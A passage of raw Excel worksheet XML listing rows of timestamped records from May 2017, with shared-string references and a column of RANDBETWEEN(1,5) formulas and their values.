    <row r="27831" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27831" s="1">
        <v>42870.502222222225</v>
      </c>
      <c r="C27831" t="s">
        <v>10</v>
      </c>
      <c r="D27831" t="s">
        <v>23</v>
      </c>
      <c r="E27831" s="2" t="s">
        <v>25331</v>
      </c>
      <c r="F27831">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27832" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27832" s="1">
        <v>42870.488935185182</v>
      </c>
      <c r="C27832" t="s">
        <v>65</v>
      </c>
      <c r="E27832" s="2" t="s">
        <v>25332</v>
      </c>
      <c r="F27832">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27833" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27833" s="1">
        <v>42870.480138888888</v>
      </c>
      <c r="C27833" t="s">
        <v>10</v>
      </c>
      <c r="D27833" t="s">
        <v>36</v>
      </c>
      <c r="E27833" t="s">
        <v>25333</v>
      </c>
      <c r="F27833">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27834" s="1">
        <v>42870.476238425923</v>
      </c>
      <c r="C27834" t="s">
        <v>10</v>
      </c>
      <c r="D27834" t="s">
        <v>381</v>
      </c>
      <c r="E27834" t="s">
        <v>25334</v>
      </c>
      <c r="F27834">
        <f t="shared" ca="1" si="434"/>
        <v>1</v>
      </c>
    </row>
    <row r="27835" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27835" s="1">
        <v>42870.46020833333</v>
      </c>
      <c r="C27835" t="s">
        <v>10</v>
      </c>
      <c r="D27835" t="s">
        <v>80</v>
      </c>
      <c r="E27835" t="s">
        <v>25335</v>
      </c>
      <c r="F27835">
        <f t="shared" ca="1" si="434"/>
        <v>4</v>
      </c>
    </row>
    <row r="27836" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27836" s="1">
        <v>42870.450798611113</v>
      </c>
      <c r="C27836" t="s">
        <v>253</v>
      </c>
      <c r="E27836" t="s">
        <v>25336</v>
      </c>
      <c r="F27836">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27837" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27837" s="1">
        <v>42870.442800925928</v>
      </c>
      <c r="C27837" t="s">
        <v>10</v>
      </c>
      <c r="D27837" t="s">
        <v>86</v>
      </c>
      <c r="E27837" s="2" t="s">
        <v>25337</v>
      </c>
      <c r="F27837">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27838" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27838" s="1">
        <v>42870.441793981481</v>
      </c>
      <c r="C27838" t="s">
        <v>10</v>
      </c>
      <c r="D27838" t="s">
        <v>817</v>
      </c>
      <c r="E27838" t="s">
        <v>25338</v>
      </c>
      <c r="F27838">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27839" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27839" s="1">
        <v>42870.436157407406</v>
      </c>
      <c r="C27839" t="s">
        <v>10</v>
      </c>
      <c r="D27839" t="s">
        <v>1091</v>
      </c>
      <c r="E27839" s="2" t="s">
        <v>25339</v>
      </c>
      <c r="F27839">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27840" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27840" s="1">
        <v>42870.435983796298</v>
      </c>
      <c r="C27840" t="s">
        <v>10</v>
      </c>
      <c r="D27840" t="s">
        <v>52</v>
      </c>
      <c r="E27840" s="2" t="s">
        <v>25340</v>
      </c>
      <c r="F27840">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27841" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27841" s="1">
        <v>42870.428298611114</v>
      </c>
      <c r="C27841" t="s">
        <v>2187</v>
      </c>
      <c r="E27841" s="2" t="s">
        <v>25341</v>
      </c>
      <c r="F27841">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27842" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27842" s="1">
        <v>42870.399328703701</v>
      </c>
      <c r="C27842" t="s">
        <v>41</v>
      </c>
      <c r="E27842" t="s">
        <v>25342</v>
      </c>
      <c r="F27842">
        <f t="shared" ref="F27842:F27905" ca="1" si="435">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="27843" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27843" s="1">
        <v>42870.383877314816</v>
      </c>
      <c r="C27843" t="s">
        <v>10</v>
      </c>
      <c r="D27843" t="s">
        <v>494</v>
      </c>
      <c r="E27843" s="2" t="s">
        <v>25343</v>
      </c>
      <c r="F27843">
        <f t="shared" ca="1" si="435"/>
        <v>2</v>
      </c>
    </row>
    <row r="27844" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27844" s="1">
        <v>42870.3830787037</v>
      </c>
      <c r="C27844" t="s">
        <v>65</v>
      </c>
      <c r="E27844" s="2" t="s">
        <v>25344</v>
      </c>
      <c r="F27844">
        <f t="shared" ca="1" si="435"/>
        <v>2</v>
      </c>
    </row>
    <row r="27845" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27845" s="1">
        <v>42870.376203703701</v>
      </c>
      <c r="C27845" t="s">
        <v>60</v>
      </c>
      <c r="E27845" t="s">
        <v>25345</v>
      </c>
      <c r="F27845">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27846" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27846" s="1">
        <v>42870.373449074075</v>
      </c>
      <c r="C27846" t="s">
        <v>10</v>
      </c>
      <c r="D27846" t="s">
        <v>80</v>
      </c>
      <c r="E27846" t="s">
        <v>25346</v>
      </c>
      <c r="F27846">
        <f t="shared" ca="1" si="435"/>
        <v>1</v>
      </c>
    </row>
    <row r="27847" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27847" s="1">
        <v>42870.373379629629</v>
      </c>
      <c r="C27847" t="s">
        <v>10</v>
      </c>
      <c r="D27847" t="s">
        <v>112</v>
      </c>
      <c r="E27847" s="2" t="s">
        <v>25347</v>
      </c>
      <c r="F27847">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27848" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27848" s="1">
        <v>42870.370995370373</v>
      </c>
      <c r="C27848" t="s">
        <v>10</v>
      </c>
      <c r="D27848" t="s">
        <v>163</v>
      </c>
      <c r="E27848" s="2" t="s">
        <v>25348</v>
      </c>
      <c r="F27848">
        <f t="shared" ca="1" si="435"/>
        <v>1</v>
      </c>
    </row>
    <row r="27849" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27849" s="1">
        <v>42870.354861111111</v>
      </c>
      <c r="C27849" t="s">
        <v>71</v>
      </c>
      <c r="E27849" s="2" t="s">
        <v>25349</v>
      </c>
      <c r="F27849">
        <f t="shared" ca="1" si="435"/>
        <v>1</v>
      </c>
    </row>
    <row r="27850" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27850" s="1">
        <v>42870.308217592596</v>
      </c>
      <c r="C27850" t="s">
        <v>16</v>
      </c>
      <c r="E27850" t="s">
        <v>25350</v>
      </c>
      <c r="F27850">
        <f t="shared" ca="1" si="435"/>
        <v>5</v>
      </c>
    </row>
    <row r="27851" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27851" s="1">
        <v>42870.286319444444</v>
      </c>
      <c r="C27851" t="s">
        <v>10</v>
      </c>
      <c r="D27851" t="s">
        <v>52</v>
      </c>
      <c r="E27851" s="2" t="s">
        <v>25351</v>
      </c>
      <c r="F27851">
        <f t="shared" ca="1" si="435"/>
        <v>4</v>
      </c>
    </row>
    <row r="27852" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27852" s="1">
        <v>42870.278611111113</v>
      </c>
      <c r="C27852" t="s">
        <v>41</v>
      </c>
      <c r="E27852" t="s">
        <v>25352</v>
      </c>
      <c r="F27852">
        <f t="shared" ca="1" si="435"/>
        <v>5</v>
      </c>
    </row>
    <row r="27853" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27853" s="1">
        <v>42870.243587962963</v>
      </c>
      <c r="C27853" t="s">
        <v>50</v>
      </c>
      <c r="E27853" s="2" t="s">
        <v>25353</v>
      </c>
      <c r="F27853">
        <f t="shared" ca="1" si="435"/>
        <v>1</v>
      </c>
    </row>
    <row r="27854" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27854" s="1">
        <v>42870.241655092592</v>
      </c>
      <c r="C27854" t="s">
        <v>50</v>
      </c>
      <c r="E27854" s="2" t="s">
        <v>25353</v>
      </c>
      <c r="F27854">
        <f t="shared" ca="1" si="435"/>
        <v>2</v>
      </c>
    </row>
    <row r="27855" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27855" s="1">
        <v>42870.241446759261</v>
      </c>
      <c r="C27855" t="s">
        <v>50</v>
      </c>
      <c r="E27855" s="2" t="s">
        <v>25353</v>
      </c>
      <c r="F27855">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27856" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27856" s="1">
        <v>42870.241087962961</v>
      </c>
      <c r="C27856" t="s">
        <v>50</v>
      </c>
      <c r="E27856" s="2" t="s">
        <v>25353</v>
      </c>
      <c r="F27856">
        <f t="shared" ca="1" si="435"/>
        <v>2</v>
      </c>
    </row>
    <row r="27857" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27857" s="1">
        <v>42870.084085648145</v>
      </c>
      <c r="C27857" t="s">
        <v>140</v>
      </c>
      <c r="D27857" t="s">
        <v>8765</v>
      </c>
      <c r="E27857" t="s">
        <v>25354</v>
      </c>
      <c r="F27857">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27858" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A27858" s="1">
        <v>42870.082812499997</v>
      </c>
      <c r="C27858" t="s">
        <v>41</v>
      </c>
      <c r="E27858" s="2" t="s">
        <v>25355</v>
      </c>
      <c r="F27858">
        <f t="shared" ca="1" si="435"/>
        <v>2</v>
      </c>
    </row>
    <row r="27859" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27859" s="1">
        <v>42870.062569444446</v>
      </c>
      <c r="C27859" t="s">
        <v>41</v>
      </c>
      <c r="E27859" t="s">
        <v>25356</v>
      </c>
      <c r="F27859">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27860" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27860" s="1">
        <v>42870.061076388891</v>
      </c>
      <c r="C27860" t="s">
        <v>41</v>
      </c>
      <c r="E27860" s="2" t="s">
        <v>25357</v>
      </c>
      <c r="F27860">
        <f t="shared" ca="1" si="435"/>
        <v>4</v>
      </c>
    </row>
    <row r="27861" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27861" s="1">
        <v>42869.818738425929</v>
      </c>
      <c r="C27861" t="s">
        <v>144</v>
      </c>
      <c r="E27861" t="s">
        <v>25358</v>
      </c>
      <c r="F27861">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27862" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27862" s="1">
        <v>42869.368854166663</v>
      </c>
      <c r="C27862" t="s">
        <v>166</v>
      </c>
      <c r="E27862" s="2" t="s">
        <v>25359</v>
      </c>
      <c r="F27862">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27863" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27863" s="1">
        <v>42868.996168981481</v>
      </c>
      <c r="C27863" t="s">
        <v>10</v>
      </c>
      <c r="D27863" t="s">
        <v>381</v>
      </c>
      <c r="E27863" t="s">
        <v>25360</v>
      </c>
      <c r="F27863">
        <f t="shared" ca="1" si="435"/>
        <v>1</v>
      </c>
    </row>
    <row r="27864" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27864" s="1">
        <v>42868.73877314815</v>
      </c>
      <c r="C27864" t="s">
        <v>48</v>
      </c>
      <c r="E27864" s="2" t="s">
        <v>25361</v>
      </c>
      <c r="F27864">
        <f t="shared" ca="1" si="435"/>
        <v>4</v>
      </c>
    </row>
    <row r="27865" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A27865" s="1">
        <v>42868.607314814813</v>
      </c>
      <c r="C27865" t="s">
        <v>103</v>
      </c>
      <c r="E27865" s="2" t="s">
        <v>25362</v>
      </c>
      <c r="F27865">
        <f t="shared" ca="1" si="435"/>
        <v>4</v>
      </c>
    </row>
    <row r="27866" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27866" s="1">
        <v>42868.404074074075</v>
      </c>
      <c r="C27866" t="s">
        <v>48</v>
      </c>
      <c r="E27866" s="2" t="s">
        <v>25363</v>
      </c>
      <c r="F27866">
        <f t="shared" ca="1" si="435"/>
        <v>1</v>
      </c>
    </row>
    <row r="27867" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27867" s="1">
        <v>42867.757673611108</v>
      </c>
      <c r="C27867" t="s">
        <v>16</v>
      </c>
      <c r="E27867" s="2" t="s">
        <v>25364</v>
      </c>
      <c r="F27867">
        <f t="shared" ca="1" si="435"/>
        <v>2</v>
      </c>
    </row>
    <row r="27868" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27868" s="1">
        <v>42867.742361111108</v>
      </c>
      <c r="C27868" t="s">
        <v>10</v>
      </c>
      <c r="D27868" t="s">
        <v>11</v>
      </c>
      <c r="E27868" s="2" t="s">
        <v>25365</v>
      </c>
      <c r="F27868">
        <f t="shared" ca="1" si="435"/>
        <v>4</v>
      </c>
    </row>
    <row r="27869" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27869" s="1">
        <v>42867.717326388891</v>
      </c>
      <c r="C27869" t="s">
        <v>10</v>
      </c>
      <c r="D27869" t="s">
        <v>41</v>
      </c>
      <c r="E27869" t="s">
        <v>25366</v>
      </c>
      <c r="F27869">
        <f t="shared" ca="1" si="435"/>
        <v>1</v>
      </c>
    </row>
    <row r="27870" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27870" s="1">
        <v>42867.709016203706</v>
      </c>
      <c r="C27870" t="s">
        <v>260</v>
      </c>
      <c r="E27870" t="s">
        <v>25367</v>
      </c>
      <c r="F27870">
        <f t="shared" ca="1" si="435"/>
        <v>2</v>
      </c>
    </row>
    <row r="27871" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27871" s="1">
        <v>42867.693333333336</v>
      </c>
      <c r="C27871" t="s">
        <v>10</v>
      </c>
      <c r="D27871" t="s">
        <v>17</v>
      </c>
      <c r="E27871" t="s">
        <v>25368</v>
      </c>
      <c r="F27871">
        <f t="shared" ca="1" si="435"/>
        <v>1</v>
      </c>
    </row>
    <row r="27872" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27872" s="1">
        <v>42867.678194444445</v>
      </c>
      <c r="C27872" t="s">
        <v>10</v>
      </c>
      <c r="D27872" t="s">
        <v>6</v>
      </c>
      <c r="E27872" t="s">
        <v>25369</v>
      </c>
      <c r="F27872">
        <f t="shared" ca="1" si="435"/>
        <v>1</v>
      </c>
    </row>
    <row r="27873" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27873" s="1">
        <v>42867.640023148146</v>
      </c>
      <c r="C27873" t="s">
        <v>10</v>
      </c>
      <c r="D27873" t="s">
        <v>107</v>
      </c>
      <c r="E27873" t="s">
        <v>25370</v>
      </c>
      <c r="F27873">
        <f t="shared" ca="1" si="435"/>
        <v>5</v>
      </c>
    </row>
    <row r="27874" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A27874" s="1">
        <v>42867.585138888891</v>
      </c>
      <c r="C27874" t="s">
        <v>10</v>
      </c>
      <c r="D27874" t="s">
        <v>381</v>
      </c>
      <c r="E27874" s="2" t="s">
        <v>25371</v>
      </c>
      <c r="F27874">
        <f t="shared" ca="1" si="435"/>
        <v>5</v>
      </c>
    </row>
    <row r="27875" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27875" s="1">
        <v>42867.572696759256</v>
      </c>
      <c r="C27875" t="s">
        <v>10</v>
      </c>
      <c r="D27875" t="s">
        <v>52</v>
      </c>
      <c r="E27875" t="s">
        <v>25372</v>
      </c>
      <c r="F27875">
        <f t="shared" ca="1" si="435"/>
        <v>2</v>
      </c>
    </row>
    <row r="27876" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27876" s="1">
        <v>42867.545694444445</v>
      </c>
      <c r="C27876" t="s">
        <v>10</v>
      </c>
      <c r="D27876" t="s">
        <v>39</v>
      </c>
      <c r="E27876" s="2" t="s">
        <v>25373</v>
      </c>
      <c r="F27876">
        <f t="shared" ca="1" si="435"/>
        <v>4</v>
      </c>
    </row>
    <row r="27877" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A27877" s="1">
        <v>42867.542581018519</v>
      </c>
      <c r="C27877" t="s">
        <v>163</v>
      </c>
      <c r="E27877" s="2" t="s">
        <v>25374</v>
      </c>
      <c r="F27877">
        <f t="shared" ca="1" si="435"/>
        <v>2</v>
      </c>
    </row>
    <row r="27878" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A27878" s="1">
        <v>42867.505601851852</v>
      </c>
      <c r="C27878" t="s">
        <v>6</v>
      </c>
      <c r="D27878" t="s">
        <v>25</v>
      </c>
      <c r="E27878" s="2" t="s">
        <v>25375</v>
      </c>
      <c r="F27878">
        <f t="shared" ca="1" si="435"/>
        <v>4</v>
      </c>
    </row>
    <row r="27879" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A27879" s="1">
        <v>42867.492893518516</v>
      </c>
      <c r="C27879" t="s">
        <v>189</v>
      </c>
      <c r="E27879" s="2" t="s">
        <v>25376</v>
      </c>
      <c r="F27879">
        <f t="shared" ca="1" si="435"/>
        <v>2</v>
      </c>
    </row>
    <row r="27880" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A27880" s="1">
        <v>42867.479861111111</v>
      </c>
      <c r="C27880" t="s">
        <v>10</v>
      </c>
      <c r="E27880" s="2" t="s">
        <v>25377</v>
      </c>
      <c r="F27880">
        <f t="shared" ca="1" si="435"/>
        <v>4</v>
      </c>
    </row>
    <row r="27881" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A27881" s="1">
        <v>42867.479016203702</v>
      </c>
      <c r="C27881" t="s">
        <v>10</v>
      </c>
      <c r="D27881" t="s">
        <v>20</v>
      </c>
      <c r="E27881" s="2" t="s">
        <v>25378</v>
      </c>
      <c r="F27881">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27882" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27882" s="1">
        <v>42867.468043981484</v>
      </c>
      <c r="C27882" t="s">
        <v>60</v>
      </c>
      <c r="E27882" t="s">
        <v>25379</v>
      </c>
      <c r="F27882">
        <f t="shared" ca="1" si="435"/>
        <v>1</v>
      </c>
    </row>
    <row r="27883" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27883" s="1">
        <v>42867.462546296294</v>
      </c>
      <c r="C27883" t="s">
        <v>6</v>
      </c>
      <c r="D27883" t="s">
        <v>25</v>
      </c>
      <c r="F27883">
        <f t="shared" ca="1" si="435"/>
        <v>5</v>
      </c>
    </row>
    <row r="27884" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27884" s="1">
        <v>42867.457754629628</v>
      </c>
      <c r="C27884" t="s">
        <v>10</v>
      </c>
      <c r="D27884" t="s">
        <v>36</v>
      </c>
      <c r="E27884" t="s">
        <v>25380</v>
      </c>
      <c r="F27884">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27885" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27885" s="1">
        <v>42867.429537037038</v>
      </c>
      <c r="C27885" t="s">
        <v>82</v>
      </c>
      <c r="E27885" s="2" t="s">
        <v>25381</v>
      </c>
      <c r="F27885">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27886" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27886" s="1">
        <v>42867.429398148146</v>
      </c>
      <c r="C27886" t="s">
        <v>6</v>
      </c>
      <c r="D27886" t="s">
        <v>25</v>
      </c>
      <c r="E27886" t="s">
        <v>25382</v>
      </c>
      <c r="F27886">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27887" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27887" s="1">
        <v>42867.425185185188</v>
      </c>
      <c r="C27887" t="s">
        <v>6</v>
      </c>
      <c r="D27887" t="s">
        <v>194</v>
      </c>
      <c r="E27887" t="s">
        <v>25383</v>
      </c>
      <c r="F27887">
        <f t="shared" ca="1" si="435"/>
        <v>2</v>
      </c>
    </row>
    <row r="27888" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27888" s="1">
        <v>42867.413425925923</v>
      </c>
      <c r="C27888" t="s">
        <v>16</v>
      </c>
      <c r="F27888">
        <f t="shared" ca="1" si="435"/>
        <v>1</v>
      </c>
    </row>
    <row r="27889" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27889" s="1">
        <v>42867.394791666666</v>
      </c>
      <c r="C27889" t="s">
        <v>10</v>
      </c>
      <c r="D27889" t="s">
        <v>112</v>
      </c>
      <c r="E27889" t="s">
        <v>25384</v>
      </c>
      <c r="F27889">
        <f t="shared" ca="1" si="435"/>
        <v>4</v>
      </c>
    </row>
    <row r="27890" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27890" s="1">
        <v>42867.392835648148</v>
      </c>
      <c r="C27890" t="s">
        <v>16</v>
      </c>
      <c r="E27890" t="s">
        <v>25385</v>
      </c>
      <c r="F27890">
        <f t="shared" ca="1" si="435"/>
        <v>2</v>
      </c>
    </row>
    <row r="27891" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A27891" s="1">
        <v>42867.391226851854</v>
      </c>
      <c r="C27891" t="s">
        <v>836</v>
      </c>
      <c r="E27891" s="2" t="s">
        <v>25386</v>
      </c>
      <c r="F27891">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27892" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27892" s="1">
        <v>42867.337465277778</v>
      </c>
      <c r="C27892" t="s">
        <v>60</v>
      </c>
      <c r="E27892" t="s">
        <v>25387</v>
      </c>
      <c r="F27892">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27893" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27893" s="1">
        <v>42867.328865740739</v>
      </c>
      <c r="C27893" t="s">
        <v>124</v>
      </c>
      <c r="E27893" t="s">
        <v>25388</v>
      </c>
      <c r="F27893">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27894" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27894" s="1">
        <v>42867.32335648148</v>
      </c>
      <c r="C27894" t="s">
        <v>10</v>
      </c>
      <c r="D27894" t="s">
        <v>163</v>
      </c>
      <c r="E27894" t="s">
        <v>25389</v>
      </c>
      <c r="F27894">
        <f t="shared" ca="1" si="435"/>
        <v>5</v>
      </c>
    </row>
    <row r="27895" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27895" s="1">
        <v>42867.284641203703</v>
      </c>
      <c r="C27895" t="s">
        <v>65</v>
      </c>
      <c r="E27895" s="2" t="s">
        <v>25390</v>
      </c>
      <c r="F27895">
        <f t="shared" ca="1" si="435"/>
        <v>1</v>
      </c>
    </row>
    <row r="27896" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27896" s="1">
        <v>42867.162557870368</v>
      </c>
      <c r="C27896" t="s">
        <v>173</v>
      </c>
      <c r="E27896" s="2" t="s">
        <v>25391</v>
      </c>
      <c r="F27896">
        <f t="shared" ca="1" si="435"/>
        <v>4</v>
      </c>
    </row>
    <row r="27897" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27897" s="1">
        <v>42867.13890046296</v>
      </c>
      <c r="C27897" t="s">
        <v>71</v>
      </c>
      <c r="E27897" s="2" t="s">
        <v>25392</v>
      </c>
      <c r="F27897">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27898" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A27898" s="1">
        <v>42867.114930555559</v>
      </c>
      <c r="C27898" t="s">
        <v>410</v>
      </c>
      <c r="E27898" s="2" t="s">
        <v>25393</v>
      </c>
      <c r="F27898">
        <f t="shared" ca="1" si="435"/>
        <v>5</v>
      </c>
    </row>
    <row r="27899" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27899" s="1">
        <v>42867.063564814816</v>
      </c>
      <c r="C27899" t="s">
        <v>41</v>
      </c>
      <c r="E27899" t="s">
        <v>25394</v>
      </c>
      <c r="F27899">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27900" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A27900" s="1">
        <v>42867.054513888892</v>
      </c>
      <c r="C27900" t="s">
        <v>845</v>
      </c>
      <c r="E27900" s="2" t="s">
        <v>25395</v>
      </c>
      <c r="F27900">
        <f t="shared" ca="1" si="435"/>
        <v>5</v>
      </c>
    </row>
    <row r="27901" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27901" s="1">
        <v>42866.941250000003</v>
      </c>
      <c r="C27901" t="s">
        <v>139</v>
      </c>
      <c r="E27901" t="s">
        <v>25396</v>
      </c>
      <c r="F27901">
        <f t="shared" ca="1" si="435"/>
        <v>5</v>
      </c>
    </row>
    <row r="27902" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A27902" s="1">
        <v>42866.875439814816</v>
      </c>
      <c r="C27902" t="s">
        <v>319</v>
      </c>
      <c r="E27902" s="2" t="s">
        <v>25397</v>
      </c>
      <c r="F27902">
        <f t="shared" ca="1" si="435"/>
        <v>2</v>
      </c>
    </row>
    <row r="27903" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27903" s="1">
        <v>42866.865104166667</v>
      </c>
      <c r="C27903" t="s">
        <v>6</v>
      </c>
      <c r="D27903" t="s">
        <v>25</v>
      </c>
      <c r="F27903">
        <f t="shared" ca="1" si="435"/>
        <v>3</v>
      </c>
    </row>
    <row r="27904" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27904" s="1">
        <v>42866.801932870374</v>
      </c>
      <c r="C27904" t="s">
        <v>10</v>
      </c>
      <c r="D27904" t="s">
        <v>6</v>
      </c>
      <c r="E27904" s="2" t="s">
        <v>25398</v>
      </c>
      <c r="F27904">
        <f t="shared" ca="1" si="435"/>
        <v>4</v>
      </c>
    </row>
    <row r="27905" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27905" s="1">
        <v>42866.801921296297</v>
      </c>
      <c r="C27905" t="s">
        <v>10</v>
      </c>
      <c r="D27905" t="s">
        <v>6</v>
      </c>
      <c r="E27905" s="2" t="s">
        <v>25398</v>
      </c>
      <c r="F27905">
        <f t="shared" ca="1" si="435"/>
        <v>5</v>
      </c>
    </row>
    <row r="27906" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27906" s="1">
        <v>42866.793877314813</v>
      </c>
      <c r="C27906" t="s">
        <v>10</v>
      </c>
      <c r="D27906" t="s">
        <v>36</v>
      </c>
      <c r="E27906" t="s">
        <v>25399</v>
      </c>
      <c r="F27906">
        <f t="shared" ref="F27906:F27969" ca="1" si="436">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="27907" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27907" s="1">
        <v>42866.75980324074</v>
      </c>
      <c r="C27907" t="s">
        <v>144</v>
      </c>
      <c r="E27907" s="2" t="s">
        <v>25400</v>
      </c>
      <c r="F27907">
        <f t="shared" ca="1" si="436"/>
        <v>4</v>
      </c>
    </row>
    <row r="27908" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27908" s="1">
        <v>42866.751550925925</v>
      </c>
      <c r="C27908" t="s">
        <v>10</v>
      </c>
      <c r="D27908" t="s">
        <v>17</v>
      </c>
      <c r="E27908" t="s">
        <v>25401</v>
      </c>
      <c r="F27908">
        <f t="shared" ca="1" si="436"/>
        <v>3</v>
      </c>
    </row>
    <row r="27909" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27909" s="1">
        <v>42866.723761574074</v>
      </c>
      <c r="C27909" t="s">
        <v>10</v>
      </c>
      <c r="D27909" t="s">
        <v>178</v>
      </c>
      <c r="E27909" t="s">
        <v>25402</v>
      </c>
      <c r="F27909">
        <f t="shared" ca="1" si="436"/>
        <v>2</v>
      </c>
    </row>
    <row r="27910" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27910" s="1">
        <v>42866.695810185185</v>
      </c>
      <c r="C27910" t="s">
        <v>10</v>
      </c>
      <c r="D27910" t="s">
